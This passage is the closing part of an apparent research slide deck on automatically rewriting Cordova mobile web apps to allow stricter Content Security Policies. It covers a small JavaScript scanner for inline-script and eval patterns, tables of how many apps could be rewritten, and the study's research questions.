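      if (kind === 'callable') continue; // a real function argument needs no relaxation
      findings.push({ line: i + 1, api: rule.api, keyword: rule.keyword, constantArg: kind === 'constant' });
    }
    const h = INNER_HTML.exec(line);
    if (h && IMPLICIT_MARKUP.test(h[2])) {
      findings.push({ line: i + 1, api: 'innerHTML (implicit markup)', keyword: 'depends on the markup', constantArg: false });
    }
  });
  return findings;
}
const SAMPLE_SOURCE = [ // constructed sample mixing constant and limiting patterns
  'setTimeout("refresh()", 1000);', 'setTimeout(someVariable, 1000);',
  'setTimeout(function () { tick(); }, 500);', 'a.style.cssText = someVariable;',
  'b.style.cssText = "color: red";', 'el.innerHTML = "<div onclick=\'track()\'></div>";',
  'el.innerHTML = "<p>plain</p>";', 'eval(code);', 'node.setAttribute("style", css);',
].join('\n');
for (const f of scan(SAMPLE_SOURCE)) console.log(`${f.line}: ${f.api} -> ${f.keyword} (constant: ${f.constantArg})`);
```

On the constructed sample the scanner reports seven findings, only two of them (the literal setTimeout string and the literal cssText) with constant arguments; the function-valued setTimeout call is skipped because it needs no policy relaxation.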
Empirical results
| Keyword | % Rewritten | % Not rewritten |
| --- | --- | --- |
| script-src: unsafe-inline | 3.27 | 0.61 |
| script-src: unsafe-eval | 0 | 98.55 |
| style-src: unsafe-inline | 8 | 22.91 |
| style-src: unsafe-eval | 2.42 | 81.33 |

Table 2: Apps we could/couldn't rewrite in relation to the total number of apps
48 / 51
Empirical results
| Keyword | % Rewritten | % Not rewritten |
| --- | --- | --- |
| script-src: unsafe-inline | 84.28 | 15.72 |
| script-src: unsafe-eval | 0 | 100 |
| style-src: unsafe-inline | 25.88 | 74.12 |
| style-src: unsafe-eval | 2.89 | 97.11 |

Table 3: Apps we could/couldn't rewrite in relation to the number of apps that needed rewriting
49 / 51
Research questions revisited
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions for real-world Cordova apps?
    1 Can we rewrite real-world Cordova apps to allow more strict CSP definitions?
    2 What patterns limit us in rewriting applications and generating CSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
    1 How prevalent are the patterns we can successfully rewrite?
    2 How prevalent are the patterns we cannot rewrite?
50 / 51
Thank You for Your Attention.
Questions?
51 / 51